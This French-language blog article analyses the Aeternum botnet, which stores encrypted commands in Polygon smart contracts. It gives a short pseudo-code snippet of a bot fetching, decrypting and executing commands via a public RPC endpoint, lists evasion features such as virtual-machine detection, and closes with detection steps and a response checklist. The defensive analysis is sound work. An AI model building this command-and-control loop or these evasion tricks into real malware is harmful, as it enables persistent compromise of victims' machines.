Botnet blockchain : comment les nouvelles infrastructures C2 menacent la cybersécurité en 2026

Théophane Villedieu

Introduction - une menace invisible qui s’appuie sur la blockchain

En 2026, plus de 40 % des incidents de cybersécurité signalés en France impliquent des botnets, selon le rapport annuel de l’ANSSI. Parmi eux, une catégorie émergente utilise la blockchain comme canal de command-and-control (C2). Le botnet blockchain Aeternum, découvert par Qrator Labs, stocke ses ordres chiffrés sur la chaîne publique Polygon, rendant chaque instruction quasi-irréversible et difficile à éradiquer. Cette approche soulève de nouvelles questions pour les équipes de défense : comment détecter des communications qui ne passent pas par des serveurs classiques ? Et quels contre-mesures mettre en place face à une infrastructure qui ne dépend ni de domaines ni de serveurs physiques ?

« Une fois qu’une commande est confirmée, elle ne peut être modifiée ou supprimée que par le détenteur du portefeuille », explique Qrator Labs. (source : rapport Qrator Labs, février 2026)

Dans cet article, nous décortiquons le fonctionnement du botnet Aeternum, comparons ses avantages et limites avec les C2 traditionnels, et proposons des étapes concrètes pour identifier et neutraliser ce type de menace.

Le fonctionnement du botnet Aeternum sur la blockchain Polygon

Architecture du C2

Aeternum repose sur un loader natif écrit en C++ (versions x86 et x64) qui intègre une bibliothèque capable de communiquer avec les points d’accès RPC de Polygon. Le processus s’articule autour de trois composantes :

  1. Le panel web - une interface Next.js qui permet à l’opérateur de créer ou sélectionner un smart contract, de choisir le type de commande (clipper, stealer, RAT, miner) et d’uploader le payload.
  2. Le smart contract - déployé sur Polygon, il expose une fonction publique qui renvoie la donnée chiffrée lorsqu’elle est appelée via RPC.
  3. Le bot - installé sur la machine victime, il interroge régulièrement le RPC, récupère la réponse, la déchiffre puis exécute la charge utile.

Ce modèle élimine la nécessité de maintenir un serveur C2 permanent ; le seul « actif » requis est le portefeuille crypto contenant quelques MATIC pour payer les frais de transaction.

Gestion des commandes via les smart contracts

Lorsqu’une nouvelle instruction est définie, le panel crée une transaction contenant les données chiffrées. La transaction est diffusée sur le réseau Polygon, où chaque nœud la valide et l’ajoute à la chaîne. Les bots, en scrutant les blocs, détectent la transaction grâce à l’adresse du contrat et extraient le champ data.

// Pseudo-code de récupération d’une commande depuis Polygon
RpcClient rpc("https://polygon-rpc.com");
std::string contractAddr = "0xABCDEF...";
std::string encryptedCmd = rpc.call(contractAddr, "getCommand", {});
std::string command = decrypt(encryptedCmd, privateKey);
execute(command);

Italic indique la première mention de termes techniques : smart contract, RPC, C2, payload.

Avantages et limites des C2 basés blockchain

Résilience face aux démantèlements

Le principal atout du botnet blockchain réside dans son immutabilité. Une fois inscrite, une transaction ne peut être censurée sans un consensus du réseau, ce qui rend les tentatives de « takedown » pratiquement inefficaces. De plus, la nature décentralisée de Polygon empêche les autorités de cibler un serveur unique ; l’opérateur n’a besoin que d’un portefeuille et d’un accès au panel.

« L’opérateur ne doit pas louer de serveurs, enregistrer de domaines ou maintenir d’infrastructure au-delà d’un portefeuille crypto », souligne le cabinet de cybersécurité tchèque (source : Qrator Labs, 2026).

Coûts opérationnels et risques

Le coût d’une transaction MATIC est d’environ 0,001 $, ce qui permet d’envoyer 100 à 150 commandes pour 1 $ de MATIC. Ainsi, le budget opérationnel d’un botnet peut être limité à quelques dizaines de dollars par an, rendant ce modèle économiquement attractif. Cependant, la visibilité publique de la blockchain expose les adresses de contrat, offrant aux analystes un point d’entrée pour la surveillance et le sandboxing.

Tableau comparatif - C2 traditionnel vs C2 blockchain

CritèreC2 traditionnelC2 blockchain (Aeternum)
Infrastructure requiseServeurs, domaines, DNSPortefeuille crypto, smart contract
Coût mensuel moyen500 $ à 2 000 $ (hébergement)< 10 $ (MATIC)
Résilience aux takedownsModérée (IP/Domain blocking)Élevée (immutabilité de la chaîne)
TraçabilitéFacile (logs serveur)Difficile (transactions anonymes)
Complexité de mise en placeFaible à moyenneÉlevée (déploiement de contrats)

Anti-analyse intégrée

POEI cybersécurité : définition, mécanisme, cas d’usage et guide complet pour les experts

Aeternum intègre plusieurs mécanismes pour éviter la détection :

  • Détection d’environnements virtualisés (VMware, Hyper-V).
  • Utilisation de Kleenscan pour vérifier la présence dans les bases de données antivirus.
  • Chiffrement des commandes avec des clés dérivées d’un secret stocké dans le portefeuille.

Comparaison avec les C2 traditionnels

Les C2 classiques reposent sur des serveurs centralisés, souvent identifiables via des adresses IP ou des noms de domaine. Leur suppression implique généralement le blocage du serveur ou la mise hors ligne du domaine. En revanche, le modèle blockchain rend la suppression pratiquement impossible sans un consensus du réseau, ce qui complique les réponses légales et techniques.

En 2025, 42 % des incidents liés aux botnets utilisaient des infrastructures résilientes (source : ANSSI, 2025). Cette tendance indique que les acteurs malveillants privilégient des architectures qui minimisent les points de rupture.

Étapes pratiques pour détecter et contrer un botnet blockchain

  1. Surveiller les requêtes RPC : configurez vos solutions de détection d’intrusion (IDS) pour alerter sur les appels sortants vers les endpoints https://polygon-rpc.com ou similaires.
  2. Analyser les flux réseau : recherchez des modèles de trafic régulier (intervalle fixe de 5-15 minutes) vers des adresses IP de nœuds Polygon.
  3. Inspecter les processus : identifiez les exécutables C++ non signés qui chargent des bibliothèques de communication RPC.
  4. Correlate avec les adresses de contrat : utilisez les API publiques de Polygon pour récupérer les transactions associées aux adresses suspectes et vérifier la présence de données chiffrées.
  5. Isoler et sandbox : exécutez les échantillons suspects dans un environnement contrôlé et observez les appels RPC et les décodages de payload.

Checklist de réponse rapide

  • Bloquer les endpoints RPC au niveau du pare-feu.
  • Mettre à jour les signatures AV avec les IOCs fournis par Qrator Labs.
  • Déployer des honeypots ciblant les appels vers Polygon pour collecter des indicateurs supplémentaires.
  • Informer le CSIRT national via le dispositif de signalement ANSSI.

Conclusion - préparer la défense face aux botnets blockchain

Le botnet blockchain représente une évolution majeure du paysage de la cybermenace : il combine faible coût, haute résilience et une visibilité réduite pour les forces de l’ordre. En 2026, les organisations devront adapter leurs stratégies de détection en incluant la surveillance des interactions avec les réseaux décentralisés et en renforçant leurs capacités d’analyse de trafic RPC.

Agissez dès maintenant : intégrez la surveillance des points d’accès Polygon dans votre SOC, formez vos analystes aux signatures de smart contracts malveillants, et restez informés des nouvelles publications de l’ANSSI et des laboratoires de recherche comme Qrator Labs. La capacité à identifier rapidement une transaction suspecte pourra faire la différence entre une infection contenue et une campagne de botnet persistante.

Guide complet pour créer un CV cybersécurité qui séduit les recruteurs en 2026